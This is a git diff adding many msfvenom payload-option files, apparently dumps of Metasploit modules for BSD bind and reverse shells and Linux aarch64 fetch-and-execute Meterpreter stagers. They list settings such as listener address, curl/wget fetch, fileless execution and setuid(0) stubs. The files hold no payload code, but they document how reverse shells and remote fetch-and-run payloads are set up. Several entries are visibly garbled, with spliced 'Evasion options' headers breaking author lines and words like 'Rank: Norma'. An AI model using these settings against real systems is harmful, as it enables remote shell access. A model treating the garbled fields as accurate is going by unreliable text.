Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_bind_tcp.txt b/msfvenom/payload_options/bsd-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..f27259c --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_bind_tcp.txt 
@@ -0,0 +1,38 @@ + + Name: BSD Command Shell, Bind TCP Inline + Module: payload/bsd/x86/shell_bind_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 73 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_bind_tcp_ipv6.txt b/msfvenom/payload_options/bsd-x86-shell_bind_tcp_ipv6.txt new file mode 100644 index 0000000..545afbb --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_bind_tcp_ipv6.txt 
@@ -0,0 +1,40 @@ + + Name: BSD Command Shell, Bind TCP Inline (IPv6) + Module: payload/bsd/x86/shell_bind_tcp_ipv6 + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 87 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_find_port.txt b/msfvenom/payload_options/bsd-x86-shell_find_port.txt new file mode 100644 index 0000000..1d374b4 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_find_port.txt 
@@ -0,0 +1,37 @@ + + Name: BSD Command Shell, Find Port Inline + Module: payload/bsd/x86/shell_find_port + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 60 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 35777 no The local client port + +Description: + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_find_tag.txt b/msfvenom/payload_options/bsd-x86-shell_find_tag.txt new file mode 100644 index 0000000..72622ea --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_find_tag.txt 
@@ -0,0 +1,33 @@ + + Name: BSD Command Shell, Find Tag Inline + Module: payload/bsd/x86/shell_find_tag + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 70 + Rank: Normal + +Provided by: + skape + +Description: + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG T2v6 yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..2a16c72 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp.txt 
@@ -0,0 +1,45 @@ + + Name: BSD Command Shell, Reverse TCP Inline + Module: payload/bsd/x86/shell_reverse_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 64 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..98e9d6a --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp_ipv6.txt 
@@ -0,0 +1,48 @@ + + Name: BSD Command Shell, Reverse TCP Inline (IPv6) + Module: payload/bsd/x86/shell_reverse_tcp_ipv6 + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 96 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + +Description: + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell-bind_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..d22b056 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell-bind_tcp.txt 
@@ -0,0 +1,43 @@ + + Name: BSDi Command Shell, Bind TCP Stager + Module: payload/bsdi/x86/shell/bind_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 69 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..e37251c --- /dev/null 
+++ b/msfvenom/payload_options/bsdi-x86-shell-reverse_tcp.txt 
@@ -0,0 +1,50 @@ + + Name: BSDi Command Shell, Reverse TCP Stager + Module: payload/bsdi/x86/shell/reverse_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 59 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell_bind_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..9506bd0 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell_bind_tcp.txt 
@@ -0,0 +1,32 @@ + + Name: BSDi Command Shell, Bind TCP Inline + Module: payload/bsdi/x86/shell_bind_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 90 + Rank: Normal + +Provided by: + skape + optyx + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell_find_port.txt b/msfvenom/payload_options/bsdi-x86-shell_find_port.txt new file mode 100644 index 0000000..81f2144 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell_find_port.txt 
@@ -0,0 +1,31 @@ + + Name: BSDi Command Shell, Find Port Inline + Module: payload/bsdi/x86/shell_find_port + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 77 + Rank: Normal + +Provided by: + skape + optyx + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 37232 no The local client port + +Description: + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..44a7e83 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell_reverse_tcp.txt 
@@ -0,0 +1,39 @@ + + Name: BSDi Command Shell, Reverse TCP Inline + Module: payload/bsdi/x86/shell_reverse_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 77 + Rank: Normal + +Provided by: + skape + optyx + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..162639c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,100 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Norma +Evasion options for payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp: +========================= + +ic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fGKaZjGk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..0418680 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QJpbzCbQetk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..1efd4f4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME htteRZaNp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
